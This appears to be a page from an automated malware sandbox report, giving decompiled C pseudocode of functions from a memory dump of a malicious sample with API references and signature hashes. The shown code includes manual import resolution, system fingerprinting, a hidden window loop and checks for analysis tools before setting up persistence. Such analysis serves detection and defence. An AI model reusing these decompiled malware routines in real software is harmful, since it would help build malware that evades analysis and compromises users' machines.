                                                                                                                                                                                                0x00afb822
                                                                                                                                                                                                0x00afb831
                                                                                                                                                                                                0x00afb83c
                                                                                                                                                                                                0x00afb849
                                                                                                                                                                                                0x00afb863
                                                                                                                                                                                                0x00afb868
                                                                                                                                                                                                0x00afb86a
                                                                                                                                                                                                0x00afb871
                                                                                                                                                                                                0x00afb881
                                                                                                                                                                                                0x00afb892
                                                                                                                                                                                                0x00afb89c
                                                                                                                                                                                                0x00afb8a4
                                                                                                                                                                                                0x00afb8ab
                                                                                                                                                                                                0x00afb8ae
                                                                                                                                                                                                0x00afb8cb

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFB807
                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000100), ref: 00AFB831
                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 00AFB863
                                                                                                                                                                                                  • Part of subcall function 00AF9621: _vsnwprintf.MSVCRT ref: 00AF963E
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00000114), ref: 00AFB89C
                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00AFB8AE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 455400327-0
                                                                                                                                                                                                • Opcode ID: 52d8cb5fdc4971b2a6c4f92748baf9416beb1bbb42790c7ab1a456dbb6a2393e
                                                                                                                                                                                                • Instruction ID: 874641f143eb7214f39031bac2d0ef2d2c57012a6950504642c33120131ad19e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 52d8cb5fdc4971b2a6c4f92748baf9416beb1bbb42790c7ab1a456dbb6a2393e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 852162B2A4021CBFD710ABE4DD4AFBE77ACDB54310F114565F605D7181EE749A488B60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFCFC6, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E00AFCFC6(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0xb0e688; // 0xb20000
				GetCurrentProcess();
				_t11 = E00AFBA47(); // executed
				_t1 = _t29 + 0x1644; // 0xb21644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00AF8F9F(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb20228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00AF8F9F(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E00AFE3F8(_t3);
				_t7 = _t29 + 0x220; // 0xb20220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E00AFE433(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                                                                                                                                                                                                0x00afcfc9
                                                                                                                                                                                                0x00afcfcb
                                                                                                                                                                                                0x00afcfd2
                                                                                                                                                                                                0x00afcfda
                                                                                                                                                                                                0x00afcfe4
                                                                                                                                                                                                0x00afcfe4
                                                                                                                                                                                                0x00afcfea
                                                                                                                                                                                                0x00afcff3
                                                                                                                                                                                                0x00afcff9
                                                                                                                                                                                                0x00afcffb
                                                                                                                                                                                                0x00afcfff
                                                                                                                                                                                                0x00afcfff
                                                                                                                                                                                                0x00afd004
                                                                                                                                                                                                0x00afd00a
                                                                                                                                                                                                0x00afd01a
                                                                                                                                                                                                0x00afd024
                                                                                                                                                                                                0x00afd02c
                                                                                                                                                                                                0x00afd02f
                                                                                                                                                                                                0x00afd03b
                                                                                                                                                                                                0x00afd041
                                                                                                                                                                                                0x00afd046
                                                                                                                                                                                                0x00afd04c
                                                                                                                                                                                                0x00afd052
                                                                                                                                                                                                0x00afd058
                                                                                                                                                                                                0x00afd060

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00B20000,?,00AF3538), ref: 00AFCFD2
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00B21644,00000105,?,?,00B20000,?,00AF3538), ref: 00AFCFF3
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFD024
                                                                                                                                                                                                • GetVersionExA.KERNEL32(00B20000,00B20000,?,00AF3538), ref: 00AFD02F
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00AF3538), ref: 00AFD035
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProcess$FileModuleNameVersionmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3581039275-0
                                                                                                                                                                                                • Opcode ID: 1253f31d58030ce3ab33e9c8547433cfbed0fcf03959b093134b2c25b6e9d110
                                                                                                                                                                                                • Instruction ID: 62172d4d21d1788419aa4256716faa2a2df8ab8bce712b3f9a45d627b2f00953
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1253f31d58030ce3ab33e9c8547433cfbed0fcf03959b093134b2c25b6e9d110
                                                                                                                                                                                                • Instruction Fuzzy Hash: C0011A70901B049FD724AFB0DD4AAEA7BE9EF94310F04082DF69A87291EF746645CB94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00B024D3, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                			E00B024D3(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E00AFE0DB(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                                                                                                                                                                                                0x00b024d9
                                                                                                                                                                                                0x00b024e1
                                                                                                                                                                                                0x00b024f6
                                                                                                                                                                                                0x00b02508
                                                                                                                                                                                                0x00b02514
                                                                                                                                                                                                0x00b0251a
                                                                                                                                                                                                0x00b0251f
                                                                                                                                                                                                0x00b0252b
                                                                                                                                                                                                0x00b02696
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02696
                                                                                                                                                                                                0x00b02531
                                                                                                                                                                                                0x00b0253a
                                                                                                                                                                                                0x00b02548
                                                                                                                                                                                                0x00b0254b
                                                                                                                                                                                                0x00b0255a
                                                                                                                                                                                                0x00b0255a
                                                                                                                                                                                                0x00b02561
                                                                                                                                                                                                0x00b0256f
                                                                                                                                                                                                0x00b02572
                                                                                                                                                                                                0x00b02589
                                                                                                                                                                                                0x00b0258f
                                                                                                                                                                                                0x00b02596
                                                                                                                                                                                                0x00b025a6
                                                                                                                                                                                                0x00b025be
                                                                                                                                                                                                0x00b025a8
                                                                                                                                                                                                0x00b025b0
                                                                                                                                                                                                0x00b025b0
                                                                                                                                                                                                0x00b025c1
                                                                                                                                                                                                0x00b025c5
                                                                                                                                                                                                0x00b025d1
                                                                                                                                                                                                0x00b025d5
                                                                                                                                                                                                0x00b025d9
                                                                                                                                                                                                0x00b025dd
                                                                                                                                                                                                0x00b025e9
                                                                                                                                                                                                0x00b02614
                                                                                                                                                                                                0x00b0261c
                                                                                                                                                                                                0x00b0262e
                                                                                                                                                                                                0x00b0263a
                                                                                                                                                                                                0x00b025eb
                                                                                                                                                                                                0x00b025f0
                                                                                                                                                                                                0x00b025fb
                                                                                                                                                                                                0x00b02607
                                                                                                                                                                                                0x00b02607
                                                                                                                                                                                                0x00b02643
                                                                                                                                                                                                0x00b02649
                                                                                                                                                                                                0x00b02653
                                                                                                                                                                                                0x00b0266f
                                                                                                                                                                                                0x00b02655
                                                                                                                                                                                                0x00b02664
                                                                                                                                                                                                0x00b02664
                                                                                                                                                                                                0x00b02653
                                                                                                                                                                                                0x00b02677
                                                                                                                                                                                                0x00b02680
                                                                                                                                                                                                0x00b02680
                                                                                                                                                                                                0x00b0268e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0268e
                                                                                                                                                                                                0x00b0259a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0259a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02572
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00B024F0
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000), ref: 00B02589
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                                • API String ID: 4133054770-1584408056
                                                                                                                                                                                                • Opcode ID: 0915e2cbd48a03727f354c2f3053bcce77caa1d2aad14a585f9c793942443fa7
                                                                                                                                                                                                • Instruction ID: 77dd3a25f8375a3fbb5e0db8d98a51139afcc509aff08d7853f1056f0787c5b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0915e2cbd48a03727f354c2f3053bcce77caa1d2aad14a585f9c793942443fa7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E616B75D00209EFDB00CF98C989BADBBF1FF08315F248599E815AB2A1D774AA84DF54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF2ECD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF2ECD(void* __eflags) {
				struct _WNDCLASSEXA _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0xb0e684; // 0x4d3f6c8
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0xb0e688; // 0xb20000
				E00AF900E(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v52.style = 3;
				_v52.cbSize = 0x30;
				_v52.lpszClassName =  &_v144;
				_v52.lpfnWndProc = E00AF2E6A;
				_v52.hInstance = _t64;
				if(RegisterClassExA( &_v52) == 0) {
					L6:
					_t34 =  *0xb0e718; // 0x50482
					if(_t34 != 0) {
						_t39 =  *0xb0e694; // 0x4d3f820
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0xb0e694; // 0x4d3f820
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0xb0e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				_t45 =  *0xb0e694; // 0x4d3f820, executed
				 *((intOrPtr*)(_t45 + 0x14))(_t44, 0);
				_t47 =  *0xb0e694; // 0x4d3f820
				 *((intOrPtr*)(_t47 + 0x18))( *0xb0e718);
				while(1) {
					_t50 =  *0xb0e694; // 0x4d3f820
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0xb0e694; // 0x4d3f820
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0xb0e694; // 0x4d3f820
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}



















                                                                                                                                                                                                0x00af2ed6
                                                                                                                                                                                                0x00af2ee5
                                                                                                                                                                                                0x00af2eec
                                                                                                                                                                                                0x00af2ef1
                                                                                                                                                                                                0x00af2f0b
                                                                                                                                                                                                0x00af2f13
                                                                                                                                                                                                0x00af2f20
                                                                                                                                                                                                0x00af2f27
                                                                                                                                                                                                0x00af2f2d
                                                                                                                                                                                                0x00af2f3a
                                                                                                                                                                                                0x00af2f43
                                                                                                                                                                                                0x00af2fc0
                                                                                                                                                                                                0x00af2fc0
                                                                                                                                                                                                0x00af2fc7
                                                                                                                                                                                                0x00af2fca
                                                                                                                                                                                                0x00af2fcf
                                                                                                                                                                                                0x00af2fcf
                                                                                                                                                                                                0x00af2fd2
                                                                                                                                                                                                0x00af2fda
                                                                                                                                                                                                0x00af2fdf
                                                                                                                                                                                                0x00af2fe7
                                                                                                                                                                                                0x00af2fe7
                                                                                                                                                                                                0x00af2f6a
                                                                                                                                                                                                0x00af2f6d
                                                                                                                                                                                                0x00af2f74
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af2f78
                                                                                                                                                                                                0x00af2f7d
                                                                                                                                                                                                0x00af2f80
                                                                                                                                                                                                0x00af2f8b
                                                                                                                                                                                                0x00af2fad
                                                                                                                                                                                                0x00af2fb4
                                                                                                                                                                                                0x00af2fb9
                                                                                                                                                                                                0x00af2fbe
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af2f93
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af2f99
                                                                                                                                                                                                0x00af2f9e
                                                                                                                                                                                                0x00af2fa5
                                                                                                                                                                                                0x00af2faa
                                                                                                                                                                                                0x00af2faa
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF2EEC
                                                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 00AF2F3D
                                                                                                                                                                                                • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00AF2F6A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClassCreateRegisterWindowmemset
                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                • API String ID: 2030675355-4108050209
                                                                                                                                                                                                • Opcode ID: 1367eb59fd0d63a8f683e3326ccb8658a7316dfe64955d6457b8ff7c2897253a
                                                                                                                                                                                                • Instruction ID: d02d743790c3eefa8a47e205e295c5f9e09cd46c7006477064fd253a6d88b4c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1367eb59fd0d63a8f683e3326ccb8658a7316dfe64955d6457b8ff7c2897253a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1831E6B1510108AFE704DFA8ED89FAA7BBCEB28344F004565B629D71A1DF31DD45CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF4D60, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                			E00AF4D60(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				WCHAR* _t185;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0xb0e688; // 0xb20000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E00AFB7EA(0xb0b9c4,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E00AFA8AF( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E00AFA4B3( &_v556, _t298);
					 *0xb0e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0xb0e680 = E00AFE1FE(0xb0b9c8, _t299);
						 *_t337 = 0x610;
						_t124 = E00AF95C2(0xb0b9c8);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0xb0e688; // 0xb20000
						_t127 = E00AF92C6(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E00AF85B6( &_v612);
						_t130 = E00AFB2AB(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E00AF85FB( &_v616, 0xfffffffe);
						_t133 =  *0xb0e688; // 0xb20000
						_t22 = _t133 + 0x114; // 0xb20114
						E00AF49FE( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0xb0e688; // 0xb20000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0xb0e680; // 0x4d3fb78
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E00AFE308(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0xb0e6b4; // 0x4d3f870
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E00AFE308(_t353,  &_v588);
								_t235 =  *0xb0e6b4; // 0x4d3f870
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0xb0e73c;
							if( *0xb0e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0xb0e680; // 0x4d3fb78
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0xb0e688; // 0xb20000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E00AF4998();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0xb0e684; // 0x4d3f6c8
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0xb0e688; // 0xb20000
											_t184 = E00AFFC57(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t185 = E00AF85E5(0x1000); // executed
												_t333 = _t185;
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E00AF109A(_t262, 0x148);
													_t305 =  *0xb0e688; // 0xb20000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E00AF900E(_t271,  &_v572);
													_t272 =  *0xb0e688; // 0xb20000
													_t188 = E00AF60C0( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0xb0e688; // 0xb20000
														__eflags = _t200 + 0x1020;
														E00AF9621(_t333, 0x1000, _v636, _t200 + 0x1020);
														E00AF85B6( &_v636);
														E00AFA953(_t333, 0, 0xbb8, 1); // executed
														E00AF85FB( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E00AF85FB( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E00AF4998();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0xb0e684; // 0x4d3f6c8
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00AF85E5(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E00AF95C2(_t278, 0x32d);
										_t280 =  *0xb0e688; // 0xb20000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00AF9621(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E00AF85B6( &_v636);
										E00AFA953(_t249, 0, 0xbb8, 1);
										E00AF85FB( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E00AF95C2(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0xb0e688; // 0xb20000
								_t329 = E00AF92C6(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E00AFB2AB(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0xb0e684; // 0x4d3f6c8
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E00AF85FB( &_v612, 0xfffffffe);
								}
								E00AF85B6( &_v616);
								_t150 =  *0xb0e688; // 0xb20000
								lstrcpynW(_t150 + 0x438,  *0xb0e740, 0x105);
								_t153 =  *0xb0e688; // 0xb20000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0xb0e738, 0x105);
								_t331 =  *0xb0e688; // 0xb20000
								_t117 = _t331 + 0x228; // 0xb20228
								 *((intOrPtr*)(_t331 + 0x434)) = E00AF8F9F(_t117, __eflags);
								E00AF85FB(0xb0e740, 0xfffffffe);
								E00AF85FB(0xb0e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E00AF95A8(0x6e2);
				_v616 = _t250;
				_t326 = E00AF95A8(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E00AF85A3( &_v616);
					_t122 = E00AF85A3( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}




















































































                                                                                                                                                                                                0x00af4d60
                                                                                                                                                                                                0x00af4d66
                                                                                                                                                                                                0x00af4d6c
                                                                                                                                                                                                0x00af4d71
                                                                                                                                                                                                0x00af4d7f
                                                                                                                                                                                                0x00af4d82
                                                                                                                                                                                                0x00af4de1
                                                                                                                                                                                                0x00af4dea
                                                                                                                                                                                                0x00af4df3
                                                                                                                                                                                                0x00af4df6
                                                                                                                                                                                                0x00af4dfd
                                                                                                                                                                                                0x00af4e02
                                                                                                                                                                                                0x00af4e07
                                                                                                                                                                                                0x00af4e0e
                                                                                                                                                                                                0x00af4e18
                                                                                                                                                                                                0x00af4e1f
                                                                                                                                                                                                0x00af4e2a
